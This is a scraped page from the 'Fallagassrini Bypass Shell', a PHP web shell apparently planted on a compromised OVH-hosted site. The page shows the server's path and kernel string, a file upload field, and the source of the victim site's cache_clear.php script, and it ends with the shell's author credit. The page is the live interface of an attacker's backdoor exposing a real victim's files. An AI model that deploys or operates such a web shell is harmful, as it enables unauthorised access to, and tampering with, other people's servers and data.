Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/happyrenas/find.myreco.online/v2/ajax/

Linux webd005.cluster105.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Upload File :
Current File : /home/happyrenas/find.myreco.online/v2/ajax/cache_clear.php

<?php
header('Content-Type: application/json; charset=utf-8');
session_start();

include("../configuration.php");
include("../includes/fonctions.php");


$ville_pays = trim($_POST['ville_pays'] ?? '');
$rayon_km   = (int)($_POST['rayon_km'] ?? 10);
if ($rayon_km <= 0) $rayon_km = 10;

if ($ville_pays === '') {
	echo json_encode(['ok' => false, 'error' => "Ville manquante."]);
	exit;
}

$parts = explode(',', $ville_pays);
$ville_clean = trim($parts[0] ?? '');
$pays_clean  = strtoupper(trim($parts[1] ?? ''));

if ($ville_clean === '' || $pays_clean === '') {
	echo json_encode(['ok' => false, 'error' => "Format invalide."]);
	exit;
}

$db->query("
	DELETE FROM ville_recherche_cache
	WHERE ville = '" . $db->escape($ville_clean) . "'
	  AND pays  = '" . $db->escape($pays_clean) . "'
	  AND rayon_km = " . (int)$rayon_km . "
	LIMIT 1
");

echo json_encode(['ok' => true]);

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net